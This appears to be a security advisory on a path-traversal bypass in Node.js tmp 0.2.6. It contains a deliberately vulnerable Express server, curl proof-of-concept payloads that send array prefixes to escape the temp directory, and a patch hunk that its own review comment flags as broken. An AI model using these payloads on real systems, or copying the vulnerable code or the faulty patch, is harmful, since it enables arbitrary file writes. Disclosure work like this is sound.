The `_assertPath` guard, introduced in [email protected] to block path traversal sequences, incorrectly assumes its input is always a string. It relies on `.includes('..')` to detect and reject dangerous values. However, when a non-string value, such as an Array, a Buffer, or any object whose `includes` method returns a falsy value, is supplied as the `prefix`, `postfix`, or `template` option, the guard fails. For an array, `['../escape'].includes('..')` returns `false` because `Array.prototype.includes` compares elements, not the stringified representation. For a duck-typed object, a custom `includes: () => false` trivially bypasses the check.
After the guard returns, the non-string value flows into `_generateTmpName`, where it is stringified (e.g., via `Array.prototype.join` or implicit `String` coercion) and then passed to `path.join(tmpDir, opts.dir, name)`. The resulting path still contains the `../` sequences, so it escapes the intended temporary directory. An attacker can then create a file or directory at an arbitrary location with the privileges of the host process.
This vulnerability affects any application that forwards untrusted data from JSON request bodies (`{"prefix":["../escape"]}`) or bracket-array query strings (`?prefix[]=../escape`) directly into `tmp.file`, `tmp.fileSync`, `tmp.dir`, `tmp.dirSync`, `tmp.tmpName`, or `tmp.tmpNameSync` without explicit type coercion. Developers who trusted the 0.2.6 release notes (which claimed the guard prevented prefix/postfix traversal) are thus still exposed.
DailyCVE Form:
Platform: Node.js tmp
Version: 0.2.6
Vulnerability: Path traversal bypass
Severity: High
Date: 11 Jun 2026
Prediction: 27 May 2026
What Undercode Say:
Install the vulnerable version:
```shell
npm install [email protected] express@5
```
victim-server.js (Express app forwarding the JSON body straight into `tmp.file`):
```javascript
const express = require('express');
const tmp = require('tmp');
const fs = require('fs');
const path = require('path');

const app = express();
app.use(express.json());

// Per-tenant scratch directory that tmp.file is expected to stay inside.
const TENANT_BASE = fs.mkdtempSync('/tmp/tenant-base-');

app.post('/upload', (req, res) => {
  // Untrusted, un-coerced value: a JSON array arrives here as an Array.
  const userPrefix = req.body.prefix;
  tmp.file({ tmpdir: TENANT_BASE, prefix: userPrefix }, (err, filepath) => {
    if (err) return res.status(400).json({ error: err.message });
    res.json({ filepath });
  });
});

app.listen(3000);
```
Attack 1: string prefix (blocked by the guard):
```shell
curl -X POST -H 'Content-Type: application/json' \
  -d '{"prefix":"../escape-string"}' http://127.0.0.1:3000/upload
```
Attack 2: array prefix (bypass):
```shell
curl -X POST -H 'Content-Type: application/json' \
  -d '{"prefix":["../escape-array"]}' http://127.0.0.1:3000/upload
```
Attack 3: multi-level traversal:
```shell
curl -X POST -H 'Content-Type: application/json' \
  -d '{"prefix":["../../../etc/poc-tmp-bypass"]}' http://127.0.0.1:3000/upload
```
Exploit:
Supply a non-string value (Array, Buffer, or object with `includes: () => false`) as the `prefix`, `postfix`, or `template` option. The guard accepts it, but later stringification reintroduces `../`, causing the final path to escape the temporary directory.
Protection:
Update to [email protected] or later. Alternatively, apply the upstream patch that enforces a strict type check before the path traversal test:
-function _assertPath(path) {
- if (path.includes("..")) {
+function _assertPath(option, value) {
+ if (typeof value !== 'string') {
+ throw new Error(<code>${option} option must be a string, got "${typeof value}".</code>);
+ }
+ if (value.includes("..")) {
throw new Error("Relative value not allowed");
}
- return path;
+ return value;
}
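Review bot: the hunk changes the `_assertPath` signature from one parameter to two (`option, value`), but no call site is updated in this hunk; every caller must be changed to pass the option name as well as the value, otherwise the new error message reports `undefined option must be a string`. Two rendering problems also need fixing before this applies: the `<code>` and `</code>` wrappers on `throw new Error(<code>${option} option must be a string, got "${typeof value}".</code>);` are residue where the template-literal backticks belong, and the unchanged context lines (`throw new Error("Relative value not allowed");`, `}`, and the closing `}`) have lost their leading space, so the hunk will not apply with `patch` as shown.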
As defence in depth, validate the final resolved path against `tmpdir` after name generation.
Impact:
Arbitrary file/directory creation outside the intended temporary directory. The attacker can write controlled content to any location the process can access, enabling tenant boundary crossing in multi‑tenant services, source tree modification in CI/CD pipelines, and potential symlink‑swap attacks. CVSS 8.1 (High).
Sources:
Reported By: github.com
Extra Source Hub:
Undercode

